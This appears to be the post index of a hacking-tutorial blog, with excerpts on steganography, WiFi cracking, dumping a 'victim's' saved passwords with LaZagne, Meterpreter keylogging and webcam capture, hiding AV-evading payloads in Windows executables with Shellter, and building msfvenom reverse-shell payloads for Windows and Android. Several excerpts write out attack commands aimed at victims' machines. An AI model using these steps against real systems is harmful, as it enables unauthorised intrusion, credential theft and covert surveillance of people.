Steganography 2; adding a secret text to an audio file

Steganography 2; adding a secret text to an audio file

In the previous tutorials we saw how to hide text message inside an image file. In this tutorial we are going to see how we can save our secret text file inside an audio file. Tools DeepSound. Steps Go and download the software in the given link below: http://jpinsoft.net/DeepSound/Download.aspx. Click on “open carrier file” and select the audio file. Now click on Output Quality to set the output file quality. Note if we set the quality high there will be…

Read More Read More

Steganography; the art of hiding text messages in image

Steganography; the art of hiding text messages in image

Steganography is the method of hiding a text message inside an image. In this tutorial we are going to see how we can use the tool. Tools needed. Stegosuite(used for stegnography). Image (to hide the message). Steps. First go to the given below website to use stegosuite. After downloading open it. For this example we are going to use the given image. You can use any image you want. Make sure the resolution is small. Click File->open and select the…

Read More Read More

How to view saved WiFi password using cmd and python tool

How to view saved WiFi password using cmd and python tool

Hello readers, during our previous tutorial we saw how we can use lazagne and see the saved WiFi and browser password In this tutorial we are going to see how we can view stored WiFi passwords using cmd and also have a chance of creating our own python tool. Steps Open the command prompt as the administrator. Type “netsh” Now type “wlan show profile” to see all the device we connected Now type “wlan show profile [wifi name] key =clear”…

Read More Read More

HOW TO GET SAVED PASSWORD OF THE VICTIM

HOW TO GET SAVED PASSWORD OF THE VICTIM

Hey guys, for this tutorial we shall need to have a physical access to a victims machine. We shall use a popular software tool to be able to retrieve and view passwords of the user. Tools needed Lazagne 2.4 Steps Download this tool using the given link below: https://github.com/AlessandroZ/LaZagne/releases/ Copy the downloaded file into desktop Now open the command prompt(search cmd in start button) Go to desktop using cd Desktop command Now type laZagne.exe to see all list of command…

Read More Read More

How to crack zip file password using python

How to crack zip file password using python

Most times we find ourselves having zip files that are password protected. In this tutorial, I am going to show you how we can use python to crack the password. Steps First we are going encrypt the sample file “test.txt” with the password – “pass” and save the zip file as “sample.zip” For cracking the password we going to use the password list from the text file (you can use the rockyou text file in the Kali Linux) Open the…

Read More Read More

How to Hack windows machine; Part 3

How to Hack windows machine; Part 3

In the previous tutorials we have learnt how to gain access to a windows system. In this tutorial we can see what we can do with meterpreter session Type help to see all command We can use the screenshot command to take screenshot of the victim current screen Type screenshot To take take webcam photo Type webcam_snap To take extract keystrokes of the victims To start keylogger Type keyscan_start To see all keystrokes Type keyscan_dump

How to add a payload to a software program

How to add a payload to a software program

In this tutorial we are going to see how we can add our payload to the executable files in windows. Tools needed Kali linux Shellter – this tool has proved most effective in creating AV evading payloads. The re-encoding capabilities of shellter allows the hacker to create an infinite number of signatures thus allowing for nearly undetection by AV software.  Steps Open the terminal and type apt install shellter      2. Open shellter by typing shellter in terminal         3….

Read More Read More

How to Hack windows machine; Part 2

How to Hack windows machine; Part 2

In the previous tutorial we learnt how to use a payload pre-loaded in kali linux using msfvenom. In this part of the tutorial we shall see how to create a listener. Steps Open terminal and type msfconsole Type use exploit/multi/handler      3.  Nowset payload using set playload windows/meterpreter/reverse_tcp      4. Nowset lhost and lport      5. Type exploit to start listening      6. Now when the victim open the file it created reverse connection We can see that a reverse connection…

Read More Read More

How to crack WiFi Password

How to crack WiFi Password

Hello friends in this tutorial we are going to learn how we to crack a WiFi password Note: for this tutorial we need wireless WiFi adapter with monitor mode Tools Kali Linux Wireless WiFi adapter with monitor mode Steps First of all copy the rockyou text file present in the usr/share/wordlists/rockyou.txt.gz (By default will be present in the Kali Linux)       2. Enable Monitor mode  Type airmon-ng to see the list of WiFi adapter Enable monitor mode by typing airmon-ng…

Read More Read More

How to hack Android phones using metasploit

How to hack Android phones using metasploit

With the increase of mobile device users and the penetration of smartphones to the population, hackers have found a new playing field for exploiting victims. In this tutorial, we are going to see how easily a hacker can gain access to an android devices and be able to gather a lot of data from it. Tools Metasploit Kali linux Steps 1.Open the terminal 2.Type msfvenom –p android/meterpreter/reverse_tcp lhost=”yourip” lport=”port” R>appname.apk Explanation -p used to set payload lhost= your ip lport=set…

Read More Read More